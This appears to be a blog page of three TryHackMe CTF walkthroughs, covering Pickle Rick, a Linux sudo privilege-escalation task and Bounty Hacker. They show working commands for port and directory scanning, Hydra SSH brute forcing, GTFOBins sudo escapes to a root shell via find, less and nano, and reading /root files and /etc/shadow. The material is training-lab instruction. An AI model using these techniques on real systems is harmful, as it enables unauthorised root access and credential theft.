Wednesday, February 23, 2022

TryHackMe - Pickle Rick - walkthrough

Pickle Rick - A Rick and Morty CTF. Help turn Rick back into a human!
It is a CTF room on TryHackMe page if you are fan of Rick and Morty cartoon you should defently try to solve it. It is not that hard and you can solve it pretty fast.
  1. step:
    2. Start target machine that you will try to exploit and start Attackbox machine.
  2. step:
    3. As usually we try with nmap scan to check what ports are open on target machine with command:

    nmap -sC -sV Target_IP


    With only 2 ports open we check the web page
  3. step:
    4. There is nothing much on the page but is it? We check the page source code where we find username which might be useful in next steps
  4. step:
    5. With use of the gobuster we scan webpage to find hidden files or directories I have used following command:

    gobuster dir -t 40 -u 10.10.151.87 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x html,php,txt -t 60


  5. step:
    6. We find the login.php access page but we are missing password. We check the robot.txt file and we get possible password candidate for login. Which turns out that it is actual username and pass.
  6. step:
    7. We end up on command panel where we can write some command like ls and we can see interesting files there with Q1 answer ingridient. We try opening filed with cat command File_name.txt but it doesnt allow us.
    We try with less command File_name.txt voila we opened it and we can answer first Q1.
  7. step:
    8. In this step we check the clue.txt file which says that we should look around directories for second ingridient. We try to get to other directories in /home/rick/ we find the file second ingridients. Since the spaces in files names and linux arent good friends we need to use less command like this:

    less '/home/rick/second ingredients'


    And voila we have 2nd ingredient and we can answer the Q2.
  8. step:
    9. with command

    sudo -l

    we check what we can run as root.
  9. step:
    10. we can try

    sudo ls -la /root

    and we find 3rd.txt
  10. step:
    11. Since we cannot open file in it's folder we can try copying to other directory and change permissions:

    sudo cp /root/3rd.txt /var/www/html/ && chmod 777 3rd.txt

  11. step:
    12. In browser open file via Target_IP/3rd.txt. and we can answer last Q3 in this room.
I hope anyone who gets stucked finds this writeup helpful.
at No comments:
Labels: , , , , , , , , , ,

Saturday, February 19, 2022

TryHackMe - Linux PrivEsc - Task 6 - Privilege Escalation : Sudo

This is probably one of the easiest type of PrivEsc tasks.
With command :

sudo -l

We check what services we can run as root. adn with this info we can answer Q1
From output of the command we see 3 services/programs that we can run as root. Now that we have this information we can head over to the GTFObins To check for each service/program that we can gain root access to system.
  • Find

    • sudo find . -exec /bin/sh \; -quit

  • Less

    • sudo less /etc/profile
    !/bin/sh

  • nano

    • sudo nano
    ^R^X
    reset; sh 1>&0 2>&0


Note about getting root via nano one command at the time ^R - is CTRL + R and ^X CTRL + X
To answer Q2 we run:

find / -type f -name flag2.txt 2>/dev/null

that we find path to the flag2.txt file
To answer Q3 we neet to check GTFObins to get command.
To answer Q4 we open /etc/shadow to find answer. I hope this post is helpfull for anyone stuck at solving this task.
at No comments:
Labels: , , , , , , , , , , , ,

Sunday, February 6, 2022

TryHackMe - Bounty Hacker -walkthrough

Bounty Hacker is one of easy rooms on TryHackMe.com
I was able to finish it up in couple of minutes with some reference from other similar rooms like this one.
  1. First step

    2. In this step you deploy the target VM and start Attackbox if you dont have it up already. It takes a minute or two to start up.

  2. Second step

    3. We use nmap to scan target VM. 
    nmap -A -T4 _IP_target_VM

    Command takes some time to scan and display us back what ports are open. You can see 3 ports open 21 with FTP, 22 ssh and 80 apache server.

  3. Third step

    4. As FTP is open and it allows you to connect with anonymous user we try to connect to FTP server on target machine with command: 
    FTP IP_target_VM

    When prompted for username you enter anonymous. We check what files we can find on server there are 2 files. One cointains note from one user this is also answer to the Q3 and other is list of what it looks like passwords. You can download files by command:
    get file_name

  4. Forth step

    5. We will use hydra brute forcing tool to check if any passwords from list we could obtain from FTP server. I used following command: 
    hydra target_VM_IP ssh -l lin -P path_to_the_password_list -s 22 -vV

    SSH user i used the one i found in file on FTP server.

  5. Fifth step

    6. After Hydra finish its work and you get correct pass you can ssh to the target VM.

  6. Sixth step

    7. When we are logged in server I tried to find user flag and write location of the file into user-flag file: 
    find / -type f -name user.txt 2>/dev/nul > user-flag

  7. Seventh step

    8. In this step we check what command can current user run as sudo. We use: 
    sudo -l

    As we see now only one command we can run. We had over to the GTFObins and check what command to run. Copy paste command to the command line and voila we have root access.
  8. Eighth step

    9. Last step is to find the root.txt file we write its location to root-flag file: 
    find / -type f -name root.txt 2>/dev/null > /tmp/root-flag


I hope this helps to the people who might get stucked during solving this room.
at No comments:
Labels: , , , , , , , , , , ,
Subscribe to: Posts (Atom)

How to Install PostgreSQL on Debian 12: A Step-by-Step Guide

PostgreSQL, commonly known as Postgres, is a powerful, open-source relational database management system renowned for its advanced features ...